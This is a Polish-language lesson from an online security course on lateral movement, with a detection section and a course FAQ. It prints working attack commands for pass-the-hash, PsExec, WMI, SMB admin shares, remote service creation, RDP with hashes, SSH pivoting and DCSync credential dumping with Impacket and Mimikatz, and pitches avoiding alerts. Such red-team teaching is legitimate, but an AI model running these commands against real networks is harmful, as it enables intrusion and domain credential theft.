Techniki poruszania się lateralnego
Nauczy się Pan/Pani poruszać po sieciach za pomocą WMI, PsExec, WinRM i udziałów SMB bez wywoływania alertów.
Techniki poruszania się lateralnego to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 3 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Czym jest ruch boczny?
Ruch boczny to zbiór technik używanych przez atakujących do stopniowego przemieszczania się w sieci po uzyskaniu początkowego dostępu — od pierwszego przyczółka w kierunku celów o większej wartości, takich jak kontrolery domeny, bazy danych i systemy kopii zapasowych.
Pass-the-Hash (PtH)
Uwierzytelnianie NTLM systemu Windows umożliwia użycie bezpośrednio skrótu hasła zamiast hasła w jawnym tekście. Atakujący, który pozyskał zrzuty skrótów NTLM, może uwierzytelnić się w innych systemach bez łamania skrótu.
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASHPass-the-Ticket (PtT)
Bilety Kerberos (TGT lub TGS) można wyodrębnić z pamięci i zaimportować, aby uwierzytelnić się jako ich posiadacz. Ataki Golden Ticket polegają na fałszowaniu biletów TGT przy użyciu skrótu KRBTGT, zapewniając nieograniczony dostęp Kerberos do domeny.
Zdalne wykonywanie kodu: PSExec
psexec (Sysinternals i Impacket) wykonuje polecenia na zdalnych hostach Windows za pośrednictwem udziałów SMB/administracyjnych. Wymaga poświadczeń administratora. Tworzy plik binarny usługi na hoście docelowym.
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecRuch boczny za pomocą WMI
Windows Management Instrumentation umożliwia zdalne wykonywanie kodu bez tworzenia plików, które mogłoby wykryć wiele narzędzi:
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB i udziały administracyjne
Udziały administracyjne Windows (C$, ADMIN$, IPC$) umożliwiają ruch boczny przy użyciu poświadczeń administratora:
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5Usługi zdalne: sc i at
Tworzenie usług lub zaplanowanych zadań w systemach zdalnych:
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP i sesje interaktywne
RDP (Remote Desktop Protocol, port 3389) zapewnia pełny interaktywny dostęp. Atakujący używają RDP przy użyciu skradzionych poświadczeń. Ochrona: należy ograniczyć RDP do serwerów przesiadkowych, wymagać NLA i rejestrować wszystkie sesje.
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5SSH jako metoda ruchu bocznego
W środowiskach Linux użycie SSH ze skradzionymi kluczami lub poświadczeniami umożliwia ruch boczny. Nadużywanie przekazywania agenta pozwala pivotować przez przejęte hosty. Tunele SSH przekazują porty, umożliwiając dostęp do systemów, które w innym przypadku byłyby niedostępne.
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostReplikacja usługi Active Directory (DCSync)
DCSync wykorzystuje replikację AD do pobrania skrótów haseł bezpośrednio z kontrolera domeny, bez uruchamiania na nim kodu — wymaga uprawnienia DS-Replication-Get-Changes-All:
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgtWykrywanie ruchu bocznego
Wskaźniki wykrywania:
- Zdarzenie 4624 (logowanie) z nietypowymi logowaniami typu 3 (sieciowymi)
- Tworzenie usług na zdalnych hostach (zdarzenie 7045)
- Połączenia SMB między stacjami roboczymi
- Tworzenie procesów WMI na zdalnych hostach
- Nietypowe zachowanie konta (użytkownik logujący się z wielu komputerów)
Szybki test: ruch boczny
Jaka technika umożliwia atakującemu uwierzytelnienie się w systemach Windows przy użyciu przechwyconego skrótu NTLM bez jego łamania?
Podsumowanie lekcji
Ruch boczny wykorzystuje przejęte poświadczenia i protokoły do rozprzestrzeniania się w sieci. Najważniejsze techniki: Pass-the-Hash (ponowne użycie skrótu NTLM), Pass-the-Ticket (Kerberos), PSExec/WMI/SMB do zdalnego wykonywania kodu oraz DCSync do pozyskiwania poświadczeń domeny. Wykrywanie: nietypowe logowania sieciowe (zdarzenie 4624), tworzenie zdalnych usług (zdarzenie 7045) i ruch SMB między stacjami roboczymi.
Często zadawane pytania
Czy lekcja „Techniki poruszania się lateralnego” jest bezpłatna?
Tak — pełny tekst „Techniki poruszania się lateralnego” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „Techniki poruszania się lateralnego”?
Nauczy się Pan/Pani poruszać po sieciach za pomocą WMI, PsExec, WinRM i udziałów SMB bez wywoływania alertów. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?
Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 3 z 4.
Ile czasu zajmuje lekcja „Techniki poruszania się lateralnego”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?
Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Frameworki C2: Cobalt Strike i Sliver
- Binarne pliki Living-Off-the-Land (LOLBins)
- Techniki poruszania się lateralnego
- Pisanie raportów red teamu